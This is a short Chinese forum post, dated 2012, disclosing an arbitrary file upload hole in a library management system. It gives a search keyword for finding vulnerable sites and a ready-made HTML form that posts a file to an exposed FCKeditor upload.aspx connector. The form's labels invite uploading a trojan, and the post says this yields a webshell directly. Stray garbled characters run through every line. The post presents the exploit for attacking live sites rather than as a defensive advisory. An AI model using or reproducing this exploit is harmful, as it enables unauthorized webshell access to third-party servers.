主题:图书馆系统任意文件上传漏洞
$ z3 c" f( t# }1 E 作者:冰锋刺客
% P& R6 I1 F0 \8 r( [0 H: F8 S 厂商:点击书(dianjishu.com)
# |0 A% [! K9 Q) `8 c5 X 日期:2012-6-21& _6 Q" I. F3 B0 i1 ?/ j$ A
( n; @9 ]4 w/ B2 UI 概述
/ H5 z2 C8 c" G# x- F 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell$ }5 q. ?$ L3 y+ \( }5 A2 q: T
II 简介. J5 K9 b u: Z" v0 d
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"8 v5 u% i2 ~: K* g# t( P" y7 e
补充一个漏洞
4 M; H y; i/ D+ w" w, i <form id="frmUpload" enctype="multipart/form-data") k8 s9 v( x a
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
; h) {( {3 ?- L! ~ <input id="btnUpload" type="submit" value="操翻他">
0 S b5 t! w" Z( _; r- F6 j5 S" u* H </form>
X$ O: U' I. h- g# p 你们懂的3 C+ H" X. V! I: [8 I
那傻逼提供还需要改包.. J: R6 j2 z" Y0 R& D2 w1 d. q
自己看了下源代码发现fckeditor# S$ b0 U, j# O, w! W
直接秒杀. ^8 G3 Z1 a' V& h" E
|
发表于 2012-9-10 21:20:59
收藏
支持
反对